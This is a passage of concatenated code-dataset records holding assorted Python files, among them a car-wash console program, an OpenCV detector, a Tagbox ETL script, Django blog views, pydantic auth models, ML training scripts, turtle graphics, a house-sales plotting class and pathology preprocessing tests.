elif Dist == 'KOMITAS':\n kom_data1 = data['choice_komtas'][0]\n print(\"\\n\",kom_data1)\n\n if Chose == 'JEEP':\n kom_data2 = data['choice_komtas'][1]\n print(\"\\n\",kom_data2,MC.code,res)\n\n elif Chose == 'SEDAN':\n kom_data3 = data['choice_komtas'][2]\n print(\"\\n\",kom_data3,MC.code,res)\n\n\n elif Dist == 'NOR-NORK':\n nor_data1 = data['choice_nornork'][0]\n print(\"\\n\",nor_data1)\n\n if Chose == 'JEEP':\n nor_data2 = data['choice_nornork'][1]\n print(\"\\n\",nor_data2,MC.code,res)\n\n elif Chose == 'SEDAN':\n nor_data3 = data['choice_nornork'][2]\n print(\"\\n\",nor_data3,MC.code,res)\n\n elif Dist == 'EREBUNI':\n erbuni_data1 = data['choice_erebuni'][0]\n print(\"\\n\",erbuni_data1)\n\n if Chose == 'JEEP':\n erbuni_data2 = data['choice_erebuni'][1]\n print(\"\\n\",erbuni_data2,MC.code,res)\n elif Chose == 'SEDAN':\n erbuni_data3 = data['choice_erebuni'][2]\n print(\"\\n\",erbuni_data3,MC.code,res)\n\n\ndef main():\n\n print('\\n Welcome \\n')\n while True:\n people_choice = input('if you want to wash your car input yes(y) if no input no ') == 'y'\n if people_choice:\n a = Result()\n a.check_choice()\n break\n elif people_choice == 'no':\n print('\\nAlways ready to help you when you need it \\n')\n break\n else:\n print('\\nIncorrect input')\n\n\nmain()\n\n\n\n\n","sub_path":"Final Project/DllMyCar.py","file_name":"DllMyCar.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"307309727","text":"import cv2\n\nclassificador = cv2.CascadeClassifier(\"cascades\\\\relogios.xml\")\n\nimagem = cv2.imread(\"outros\\\\relogio1.jpg\")\nimagemCinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)\n\ndetectado = classificador.detectMultiScale(imagemCinza, scaleFactor=1.101, minNeighbors=2, minSize=(30,30))\n\nfor(x, y, l, a) in detectado:\n imagem = cv2.rectangle(imagem, (x,y),(x + l,y + a),(0,0,255),2)\n\ncv2.imshow(\"Encontrado\",imagem)\ncv2.waitKey()\n","sub_path":"ExemploRelogio.py","file_name":"ExemploRelogio.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"51939310","text":"from pathlib import Path\n\nimport yaml\n\nfrom json_to_models.dynamic_typing.string_serializable import StringSerializable, registry\nfrom json_to_models.generator import MetadataGenerator\nfrom json_to_models.models.attr import AttrsModelCodeGenerator\nfrom json_to_models.models.base import generate_code\nfrom json_to_models.models.structure import compose_models_flat\nfrom json_to_models.registry import ModelFieldsNumberMatch, ModelFieldsPercentMatch, ModelRegistry\n\n\n@registry.add()\nclass SwaggerRef(StringSerializable, str):\n @classmethod\n def to_internal_value(cls, value: str) -> 'SwaggerRef':\n if not value.startswith(\"#/\"):\n raise ValueError(f\"invalid literal for SwaggerRef: '{value}'\")\n return cls(value)\n\n def to_representation(self) -> str:\n return str(self)\n\n\ndef load_data() -> dict:\n with (Path(__file__) / \"..\" / \"..\" / \"spotify-swagger.yaml\").resolve().open() as f:\n data = yaml.load(f, Loader=yaml.SafeLoader)\n return data\n\n\ndef main():\n data = load_data()\n del data[\"paths\"]\n\n gen = MetadataGenerator(\n dict_keys_regex=[],\n dict_keys_fields=[\"securityDefinitions\", \"paths\", \"responses\", \"definitions\", \"properties\", \"scopes\"]\n )\n reg = ModelRegistry(ModelFieldsPercentMatch(.5), ModelFieldsNumberMatch(10))\n fields = gen.generate(data)\n reg.process_meta_data(fields, model_name=\"Swagger\")\n reg.merge_models(generator=gen)\n reg.generate_names()\n\n structure = compose_models_flat(reg.models_map)\n code = generate_code(structure, AttrsModelCodeGenerator)\n print(code)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"testing_tools/real_apis/spotify-swagger.py","file_name":"spotify-swagger.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108840359","text":"from config import tagbox\nfrom logs.logger import log\n\nimport requests\nimport json\nimport jwt\n\n\nverbose = True\ntest = True\nlog('etl start')\n\n\n\n# Extract data from Tagbox\n\ntagbox_doc_endpoint = tagbox.document_endpoint\ntagbox_tag_endpoint = tagbox.geotag_endpoint\n#tagbox_params = {'doc_id': tagbox.test_doc_id}\n#tagbox_params = tagbox.test_docs\ntagbox_params = {}\ntagbox_secret = tagbox.secret\njwt_algorithm = 'HS256'\njwt_headers = {'kid': tagbox.key}\n\ntagbox_token = jwt.encode(\n tagbox_params,\n tagbox_secret,\n jwt_algorithm,\n jwt_headers\n).decode()\n\ntagbox_headers = {\n 'Authorization': 'Bearer {}'.format(tagbox_token)\n}\n\nif verbose:\n print('Tagbox request:\\n{}\\n'.format('\\n'.join([\n tagbox_tag_endpoint, \n str(tagbox_params),\n str(jwt_headers),\n str(tagbox_headers)]))\n )\n\ntagbox_tag_request = requests.get(\n tagbox_tag_endpoint,\n params=tagbox_params,\n headers=tagbox_headers\n)\ntagbox_tag_results = tagbox_tag_request.text\ntagbox_tags = json.loads(tagbox_tag_results)\n\nlog('{} tagbox tag results'.format(len(tagbox_tags)))\nif verbose:\n print('Tagbox tags:\\t{}'.format(len(tagbox_tags)))\n #print('Tags: {}'.format(tagbox_tags))\n\nunique_tagbox_docs = {}\nfor tag in tagbox_tags:\n if tag['created_at'] > '2019-01-22 19':\n unique_tagbox_docs[tag['postId']] = {} \n\nfor document_id in unique_tagbox_docs.keys():\n doc_params = {'document_id': document_id}\n doc_request_token = jwt.encode(\n doc_params,\n tagbox_secret,\n jwt_algorithm,\n jwt_headers\n ).decode()\n doc_headers = {\n 'Authorization': 'Bearer {}'.format(doc_request_token)\n }\n tagbox_doc_request = requests.get(\n tagbox_doc_endpoint, \n params=doc_params, \n headers=doc_headers\n )\n doc_result = tagbox_doc_request.text\n #print(doc_result)\n doc = json.loads(doc_result)\n print('document request results {}'.format(len(doc)))\n unique_tagbox_docs[document_id] = doc[0]\n\nlog('{} tagbox doc results'.format(len(unique_tagbox_docs)))\n#if verbose:\n# print('Tagbox docs: {}'.format(len(unique_tagbox_docs)))\n# for doc_id, doc in unique_tagbox_docs.items():\n#print('\\n{}\\n{}\\n{}'.format(doc_id, doc['url'][:20], doc['title'][:20]))\n\n\n\n","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"392955350","text":"from django.shortcuts import render, redirect\nfrom .models import Title, Text\nfrom .forms import TitleForm, TextForm\n\n# Create your views here.\ndef index(request):\n return render(request, 'practice_blogs/index.html', {})\n\ndef titles(request):\n titles = Title.objects.order_by('date_added')\n context = {'titles':titles}\n return render(request, 'practice_blogs/titles.html', context)\n\ndef title(request, title_id):\n title = Title.objects.get(id=title_id)\n texts = title.text_set.order_by('-date_added')\n context = {'title':title, 'texts':texts}\n return render(request, 'practice_blogs/title.html', context)\n\ndef new_title(request):\n if request.method != 'POST':\n form = TitleForm()\n\n else:\n form = TitleForm(data = request.POST)\n if form.is_valid():\n form.save()\n return redirect('practice_blogs:titles')\n\n context = {'form':form}\n return render(request, 'practice_blogs/new_title.html', context)\n\ndef new_text(request, title_id):\n title = Title.objects.get(id=title_id)\n\n if request.method != 'POST':\n form = TextForm()\n\n else:\n form = TextForm(data = request.POST )\n if form.is_valid():\n new_text = form.save(commit = False)\n new_text.title = title\n new_text.save()\n return redirect('practice_blogs:title', title_id=title_id)\n\n context = {'title':title, 'form':form}\n return render(request, 'practice_blogs/new_text.html', context)\n\ndef edit_text(request, tx_id):\n desc = Text.objects.get(id=tx_id)\n title = desc.title \n\n if request.method != 'POST':\n form = TextForm(instance = desc)\n\n else:\n form = TextForm(instance = desc, data = request.POST)\n if form.is_valid():\n form.save()\n return redirect('practice_blogs:title', title_id = title.id)\n\n context = {'title':title, 'desc':desc, 'form':form}\n return render(request, 'practice_blogs/edit_text.html', context)\n\n\n","sub_path":"practice_blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284485668","text":"from pydantic.networks import EmailStr\r\nfrom auth_server.api.dependencies.queries_to_redis import exist_email, exist_username\r\nfrom datetime import datetime\r\nfrom typing import Optional\r\nfrom uuid import UUID\r\n\r\nfrom pydantic import BaseModel, validator\r\n\r\n\r\nclass User(BaseModel):\r\n user_id: int\r\n username: str\r\n full_name: str\r\n email: str\r\n\r\n\r\nclass UserInDB(User):\r\n hashed_password: str\r\n\r\n\r\nclass RefreshToken(BaseModel):\r\n refresh_token: UUID\r\n user_id: int\r\n fingerprint: str\r\n created_at: datetime\r\n expired_at: datetime\r\n unused: bool\r\n\r\n\r\nclass ResponseAuth(BaseModel):\r\n operation: str\r\n successful: bool\r\n\r\n\r\nclass TokenData(BaseModel):\r\n username: Optional[str] = None\r\n\r\n\r\nclass UsernameAndExist(BaseModel):\r\n username: str\r\n exist_username: bool\r\n\r\n\r\nclass EmailAndExist(BaseModel):\r\n email: str\r\n exist_email: bool\r\n\r\n\r\nclass UniqueUsernameAndEmail(BaseModel):\r\n username: UsernameAndExist\r\n email: EmailAndExist\r\n\r\n @validator(\"username\")\r\n def username_validation(cls, v: str):\r\n if v.exist_username:\r\n raise ValueError('Username already exists')\r\n if exist_username(v.username) != 0:\r\n raise ValueError('Username already exists')\r\n return v\r\n\r\n @validator(\"email\")\r\n def email_validation(cls, v: str):\r\n if v.exist_email:\r\n raise ValueError('Email already exists')\r\n if exist_email(v.email) != 0:\r\n raise ValueError('Email already exists')\r\n return v\r\n\r\n\r\nclass EmailRequest(BaseModel):\r\n email: EmailStr\r\n","sub_path":"auth_server/auth_server/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311331911","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.datasets import ImageFolder\nfrom PIL import Image\nimport numpy as np\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport argparse\nfrom encoderCNN import *\n\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--dataroot', default=\"data/\" ,help='path to dataset')\nparser.add_argument('--batch_size', type=int, default=64, metavar='N',\nhelp='input batch size for training (default: 64)')\nparser.add_argument('--no_cuda', action='store_true', default=False,\nhelp='disables CUDA training')\nparser.add_argument('--epochs', type=int, default=20, metavar='N',\nhelp='number of epochs to train (default: 10)')\nparser.add_argument('--code_size', type=int, default=1024, metavar='N',\nhelp='Encoded size (default: 256)')\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\nhelp='SGD momentum (default: 0.5)')\nparser.add_argument('--train', default=True, action='store_true',\nhelp='training a ConvNet model on MNIST dataset')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N',\nhelp='how many batches to wait before logging training status')\nparser.add_argument('--save_dir', type=str, default=\"cpc_model\", metavar='N',\nhelp='Where to save the encoder?')\nparser.add_argument('--model', type=str, default=\"cpc_encoder\", metavar='N',\nhelp='Name of saved model (Without .pth)')\nparser.add_argument('--test_batch_size', type=int, default=1000, metavar='N',\nhelp='input batch size for testing (default: 1000)')\nparser.add_argument('--dataset', type=str, default=\"MNIST\", metavar='N',\nhelp='Which dataset?(MNIST/CIFAR10)(Default: MNIST)')\nparser.add_argument('--use_cpc', type=bool, default=\"True\", metavar='N',\nhelp='Use CPC Features?(Default:True) set to False to use pixels flattened image.')\nargs = parser.parse_args()\n\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\n\n\nif args.dataset==\"MNIST\":\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST(root=args.dataroot, train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST(root=args.dataroot, train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n num_channels=1\nelse:\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root=args.dataroot, train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root=args.dataroot, train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\nbatch_size=args.batch_size, shuffle=True, **kwargs)\n num_channels=3\n\nencoder = encoderCNN(num_channels,args.code_size)\nif args.cuda:\n\tencoder.to(\"cuda\")\nencoder.load_state_dict(torch.load(args.save_dir+\"/\"+args.model+\".pth\"))\n\nclass Classifier(nn.Module):\n\tdef __init__(self):\n\t\tsuper(Classifier,self).__init__()\n\t\tif args.use_cpc:\n\t\t\tself.linear=nn.Linear(args.code_size,10)\n\t\telse:\n\t\t\tself.linear=nn.Linear(32*32*3,10)\n\tdef forward(self,x):\n\t\tx=self.linear(x)\n\t\treturn F.log_softmax(x)\n\nmodel=Classifier()\nif args.cuda:\n\tmodel.to('cuda')\n\noptimizer=optim.Adam(model.parameters(), lr=0.001)\n\ndef train():\n\tmodel.train()\n\tfor batch_idx,(data,target) in enumerate(train_loader):\n\t\tif args.cuda:\n\t\t\tdata,target=data.to(\"cuda\"),target.to('cuda')\n\t\tif args.use_cpc:\n\t\t\tdata=encoder(data)\n\t\t\t#print(data.shape)\n\t\t\tdata=torch.mean(torch.mean(data,-1),-1)\n\t\t\t#print(data.shape)\n\t\telse:\n\t\t\tdata=data.view(data.shape[0],-1)\n\t\tdata,target=Variable(data),Variable(target)\n\t\toptimizer.zero_grad()\n\t\t#print(data.shape)\n\t\toutput = model(data)\n\t\t#print(output.shape)\n\t\tloss=F.nll_loss(output,target)\n\t\tloss.backward()\n\t\toptimizer.step()\n\t\tif batch_idx % args.log_interval == 0:\n\t\t\tprint('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n\t\t\t\tepoch, batch_idx * len(data), len(train_loader.dataset),\n\t\t\t\t100. * batch_idx / len(train_loader), loss.item()))\n\ndef validate():\n\tmodel.eval()\n\tcorrect=0\n\ttest_loss=0\n\tfor batch,(data,target) in enumerate(test_loader):\n\t\tif args.cuda:\n\t\t\tdata,target=data.to(\"cuda\"),target.to('cuda')\n\t\tif args.use_cpc:\n\t\t\tdata=encoder(data)\n\t\t\t#print(data.shape)\n\t\t\tdata=torch.mean(torch.mean(data,-1),-1)\n\t\t\t#print(data.shape)\n\t\telse:\n\t\t\tdata=data.view(data.shape[0],-1)\n\t\tdata,target=Variable(data),Variable(target)\n\t\twith torch.no_grad():\n\t\t\toutput = model(data)\n\t\t\ttest_loss += F.nll_loss(output, target, size_average=False).data.item() # sum up batch loss\n\t\t\tpred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n\t\t\tcorrect += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n\ttest_loss /= len(test_loader.dataset)\n\tprint('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n\ttest_loss, correct, len(test_loader.dataset),\n\t100. * correct / len(test_loader.dataset)))\n\nif args.train:\n\tfor epoch in range(1,args.epochs+1):\n\t\ttrain()\n\t\tvalidate()\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"103735155","text":"# Chapter 3\n# polygons.py - Program that creates an equilateral triangle\n# using the turtle module\n\n\nimport turtle\n\nwn = turtle.Screen()\nwn.bgcolor('black')\n\njosh = turtle.Turtle()\njosh.color('white')\njosh.pensize(2)\njosh.speed(2)\njosh.penup()\njosh.forward(-300)\njosh.pendown()\n\n# Creates an equilateral triangle\nfor i in range(3):\n josh.forward(40)\n josh.left(120)\n\njosh.penup()\njosh.forward(100)\njosh.pendown()\n\n# Creates a square\nfor j in range(4):\n josh.forward(40)\n josh.left(90)\n\njosh.penup()\njosh.forward(120)\njosh.pendown()\n\n# Creates a hexagon\nfor k in range(6):\n josh.forward(40)\n josh.left(60)\n\njosh.penup()\njosh.forward(140)\njosh.pendown()\n\n# Creates a octagon\nfor l in range(8):\n josh.forward(40)\n josh.left(45)\n\nwn.mainloop()\n","sub_path":"Chapter 3/polygons.py","file_name":"polygons.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78750501","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.ticker as mtick\n\nmatplotlib.use('agg', warn=False, force=True)\nfrom matplotlib import pyplot as plt\nimport os\n\nfrom Webtest.settings import STATIC_URL, BASE_DIR\n\n\nclass ProcessFile:\n df = pd.DataFrame\n dcc = pd.DataFrame\n\n plotimage = \"\"\n\n def createDataframe(self, filename):\n\n # filepath = \"/Users/ajit/PycharmProjects/Webtest/templates/blogsite/Millburn.csv\"\n fileinp = 'static/Data/' + filename\n filepath = os.path.join(BASE_DIR, fileinp)\n # df = pd.read_csv(filepath, parse_dates=['Sale Date'], error_bad_lines=False)\n df = pd.read_csv(filepath, error_bad_lines=False)\n self.dfinp = df\n return df\n\n def plotgraph(self, fieldname):\n df = self.dfinp\n df1 = df[(df['Sale Date'] >= '1980-01-01') & (df['Sale Date'] <= '2020-01-01') & (df['Sale Price'] > 99999) & (\n df['Sale Price'] < 20000000)]\n df1['Year'] = pd.to_datetime(df1['Sale Date']).dt.to_period('Y')\n plt.style.use('seaborn-whitegrid')\n dfp = pd.pivot_table(df1, values='Sale Price', index=['Year'], columns=['Municipality'],\n aggfunc=np.count_nonzero)\n plt.rcParams['figure.figsize'] = 12, 6\n dfp.plot()\n relpath = 'static/images/temp1.png'\n filepath = os.path.join(BASE_DIR, relpath)\n plt.savefig(filepath)\n return relpath\n\n def getchoices(self):\n p = {}\n dlist = np.arange(1, len(self.dfinp.columns))\n clist = self.dfinp.columns\n for i in range(len(clist) - 3):\n p[dlist[i]] = clist[i]\n t = p.items()\n return t\n\n def get_columnlist(self):\n self\n return\n\n def getSalesPriceCount(self, df, type):\n\n fileinp = 'static/images/Essex/sales'\n fpath = os.path.join(BASE_DIR, fileinp)\n\n filelists = [file for file in os.listdir(fpath) if file.endswith('price.png')]\n filelistc = [file for file in os.listdir(fpath) if file.endswith('count.png')]\n\n filelists.sort()\n filelistc.sort()\n return filelists,filelistc\n\n def boxplotbymuni(self,tid,yfrom):\n\n df1 = self.df[(self.df['Sale Date'] >= yfrom+'-01-01') & (self.df['Sale Date'] <= '2018-01-01') & (self.df['Sale Price'] > 99999) & (\n self.df['Sale Price'] < 7500000)&(self.df['Municipality'] == int(tid))]\n df1['Code'] = df1['Municipality']\n df1['Sale Date'] = pd.to_datetime(df1['Sale Date'])\n df1['Yr'] = df1['Sale Date'].dt.to_period('Y')\n #dat = pd.merge(df1, self.dcc, on=['Code'])\n\n #f1 = dat[(dat['Code'] == int(tid)) & (dat['Sale Date'] >= '2000-01-01')]\n d1 = df1.pivot(columns='Yr', values='Sale Price')\n plt.figure(figsize=(18, 7))\n plt.xlabel('Year',fontsize=16)\n plt.ylabel('Sale Price',fontsize=16)\n title = 'Sale price of houses in ' + self.dcc[self.dcc['Code']==int(tid)].iloc[0,0]\n title = title + ', From Year : ' + yfrom\n plt.title(title, fontsize=20)\n d1.boxplot()\n fmt = '${x:,.0f}'\n tick = mtick.StrMethodFormatter(fmt)\n plt.gca().yaxis.set_major_formatter(tick)\n plt.ylim((25, 5000000))\n relpath = 'static/images/temp1.png'\n filepath = os.path.join(BASE_DIR, relpath)\n plt.savefig(filepath)\n return relpath\n","sub_path":"blogsite/ProcessFile.py","file_name":"ProcessFile.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"629498580","text":"import argparse\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.layers import Lambda, Conv2D, Dropout, Dense, Flatten, Convolution2D, MaxPooling2D\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras import backend as K\nfrom test_models.utils import IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS\n\nimport logging\nlogging.disable(logging.WARNING)\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n# import warnings filter\nfrom warnings import simplefilter\n\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.utils import shuffle\n\nfrom test_models.batch_generator import Generator\nfrom test_models.utils import INPUT_SHAPE\n\nnp.random.seed(0)\n\ndef load_data(args):\n \"\"\"\n Load training data and split it into training and validation set\n \"\"\"\n tracks = [\"track1\"]\n drive = ['normal', 'recovery', 'reverse']\n\n x = None\n y = None\n path = None\n x_train = None\n y_train = None\n x_valid = None\n y_valid = None\n\n for track in tracks:\n for drive_style in drive:\n try:\n path = os.path.join(args.data_dir, track, drive_style, 'driving_log.csv')\n data_df = pd.read_csv(path)\n if x is None:\n x = data_df[['center', 'left', 'right']].values\n y = data_df['steering'].values\n else:\n x = np.concatenate((x, data_df[['center', 'left', 'right']].values), axis=0)\n y = np.concatenate((y, data_df['steering'].values), axis=0)\n except FileNotFoundError:\n print(\"Unable to read file %s\" % path)\n continue\n\n if x is None or y is None:\n print(\"No driving data were provided for training. Provide correct paths to the driving_log.csv files\")\n exit()\n\n try:\n x_train, x_valid, y_train, y_valid = train_test_split(x, y, test_size=args.test_size, random_state=0)\n except TypeError:\n print(\"Missing header to csv files\")\n exit()\n\n print(\"Train dataset: \" + str(len(x_train)) + \" elements\")\n print(\"Test dataset: \" + str(len(x_valid)) + \" elements\")\n return x_train, x_valid, y_train, y_valid\n\n\ndef build_model(args):\n \"\"\"\n Modified NVIDIA model\n \"\"\"\n model = Sequential()\n model.add(Lambda((lambda x: ((x / 127.5) - 1.0)), input_shape=INPUT_SHAPE))\n model.add(Conv2D(24, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(36, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(48, (5, 5), activation='elu', strides=(2, 2)))\n model.add(Conv2D(64, (3, 3), activation='elu'))\n model.add(Conv2D(64, (3, 3), activation='elu'))\n model.add(Dropout(args.keep_prob))\n model.add(Flatten())\n model.add(Dense(100, activation='elu'))\n model.add(Dense(50, activation='elu'))\n model.add(Dense(10, activation='elu'))\n model.add(Dense(1))\n\n model.summary()\n return model\n\n\ndef get_generators(args, x_train, x_valid, y_train, y_valid):\n x_train, y_train = shuffle(x_train, y_train, random_state=0)\n x_valid, y_valid = shuffle(x_valid, y_valid, random_state=0)\n\n x_train: 'x_train'\n y_train: 'y_train'\n\n train_generator = Generator(x_train, y_train, True, args)\n validation_generator = Generator(x_valid, y_valid, False, args)\n\n return train_generator, validation_generator\n\n\ndef train_model(model_dir, model, args, x_train, x_valid, y_train, y_valid):\n\n checkpoint = ModelCheckpoint('EPOCH' + '-{epoch:03d}.h5',\n monitor='val_loss',\n verbose=0,\n save_best_only=args.save_best_only, # save the model only if the val_loss gets low\n mode='auto',\n period=20)\n print(args.learning_rate)\n model.compile(loss='mean_squared_error', optimizer=Adam(lr=args.learning_rate))\n\n train_generator, validation_generator = get_generators(args, x_train, x_valid, y_train, y_valid)\n\n history = model.fit_generator(train_generator,\n validation_data=validation_generator,\n epochs=args.nb_epoch,\n callbacks=[checkpoint],\n verbose=1)\n # save the last model anyway (might not be the best)\n model.save(os.path.join(model_dir, \"udacity_trained.h5\"))\n\n score = model.evaluate_generator(train_generator)\n return [score, score]\n\n\ndef s2b(s):\n \"\"\"\n Converts a string to boolean value\n \"\"\"\n s = s.lower()\n return s == 'true' or s == 'yes' or s == 'y' or s == '1'\n\n\ndef main(mutation_final_name):\n model_dir = os.path.join('trained_models')\n model_loc = os.path.join(model_dir, mutation_final_name)\n\n parser = argparse.ArgumentParser(description='Behavioral Cloning Training Program')\n parser.add_argument('-d', help='data directory', dest='data_dir', type=str,\n default=os.path.join('..', 'Datasets', 'Udacity'))\n parser.add_argument('-t', help='test size fraction', dest='test_size', type=float, default=0.2)\n parser.add_argument('-k', help='drop out probability', dest='keep_prob', type=float, default=0.5)\n parser.add_argument('-n', help='number of epochs', dest='nb_epoch', type=int, default=50)\n parser.add_argument('-s', help='samples per epoch', dest='samples_per_epoch', type=int, default=100)\n parser.add_argument('-b', help='batch size', dest='batch_size', type=int, default=64)\n parser.add_argument('-o', help='save best models only', dest='save_best_only', type=s2b, default='true')\n parser.add_argument('-l', help='learning rate', dest='learning_rate', type=float, default=1.0e-4)\n args = parser.parse_args()\n print('-' * 30)\n print('Parameters')\n print('-' * 30)\n for key, value in vars(args).items():\n print('{:<20} := {}'.format(key, value))\n print('-' * 30)\n\n data = load_data(args)\n train_generator, validation_generator = get_generators(args, *data)\n\n if not os.path.exists(model_loc):\n print('model does not exist')\n import tensorflow as tf\n if tf.test.gpu_device_name():\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n else:\n print(\"Please install GPU version of TF\")\n \"\"\"\n Load train/validation data set and train the model\n \"\"\"\n\n model = build_model(args)\n score = train_model(model_dir, model, args, *data)\n else:\n print('model exists')\n model = tensorflow.keras.models.load_model(model_loc)\n metric_value = model.evaluate_generator(train_generator)\n K.clear_session()\n score = [metric_value, metric_value]\n return score\n\nif __name__ == '__main__':\n\n main('')\n","sub_path":"test_models/train_self_driving_car_train.py","file_name":"train_self_driving_car_train.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358876515","text":"import pytest\nimport os, shutil\nimport json\nimport numpy as np\nimport openslide\nfrom openslide.deepzoom import DeepZoomGenerator\n\nfrom luna_pathology.common.preprocess import *\n\noutput_dir = \"tests/luna_pathology/common/testdata/output-123\"\nslide_path = \"tests/luna_pathology/common/testdata/123.svs\"\nscores_csv_path = \"tests/luna_pathology/common/testdata/input/tile_scores_and_labels.csv\"\nslide = openslide.OpenSlide(slide_path)\nimg_arr = get_downscaled_thumbnail(slide, 10)\n\ndef test_get_scale_factor_at_magnification_double():\n # slide scanned mag is 20\n res = get_scale_factor_at_magnfication(slide, 10)\n assert 2 == res\n\ndef test_get_scale_factor_at_magnification_error():\n # slide scanned mag is 20\n with pytest.raises(ValueError):\n get_scale_factor_at_magnfication(slide, 40)\n\ndef test_get_tile_color():\n\n res = get_tile_color(0.1)\n assert 3 == len(res)\n\ndef test_get_tile_color_str():\n\n res = get_tile_color(\"blue\")\n assert 3 == len(res)\n\ndef test_get_full_resolution_generator():\n\n generator, level = get_full_resolution_generator(slide, 128)\n assert isinstance(generator, DeepZoomGenerator)\n assert 12 == level\n\ndef test_get_downscaled_thumbnail():\n res = get_downscaled_thumbnail(slide, 10)\n\n assert isinstance(res, np.ndarray)\n\ndef test_array_to_slide():\n res = array_to_slide(img_arr)\n\n assert isinstance(res, openslide.ImageSlide)\n\ndef test_make_otsu():\n\n res = make_otsu(img_arr[:,:,1])\n\n assert 0 == np.count_nonzero(res[0])\n assert isinstance(res, np.ndarray)\n\ndef test_pretile_scoring(requests_mock):\n\n # setup\n os.makedirs(output_dir, exist_ok=True)\n\n params = {\"tile_size\":128,\n \"requested_magnification\":20,\n \"project_id\": \"project\",\n \"labelset\": \"default_labels\",\n \"filter\": {\n \"otsu_score\": 0.5\n },\n \"annotation_table_path\": \"tests/luna_pathology/common/testdata/project/tables/REGIONAL_METADATA_RESULTS\"\n }\n res = pretile_scoring(slide_path, output_dir,\n \"tests/luna_pathology/common/testdata/project/tables/REGIONAL_METADATA_RESULTS\",\n params, \"123\")\n\n print(res)\n assert 'tests/luna_pathology/common/testdata/output-123/tiles.slice.pil' == res['data']\n assert 'tests/luna_pathology/common/testdata/output-123/address.slice.csv' == res['aux']\n assert 'RGB' == res['pil_image_bytes_mode']\n assert 20 == res['full_resolution_magnification']\n assert ['coordinates', 'otsu_score', 'purple_score', 'regional_label'] == res['available_labels']\n assert '123.svs' == res['image_filename']\n\n # clean up\n shutil.rmtree(output_dir)\n\n\"\"\"\n# works on a cuda enabled env\ndef test_run_model():\n\n params = {\n \"model_package\": \"luna_pathology.models.eng_tissuenet\",\n \"model\": {\n \"checkpoint_path\": \"/gpfs/mskmindhdp_emc/user/shared_data_folder/kohlia/tile_classifier/ckpts/4.ckpt\",\n \"n_classes\": 5\n }\n }\n res = run_model('/gpfs/mskmindhdp_emc/data/TCGA-BRCA/TCGA-D8-A4Z1-01Z-00-DX1.D39D38B5-FC9F-4298-8720-016407DC6591/test_collect_tiles/tiles.slice.pil',\n 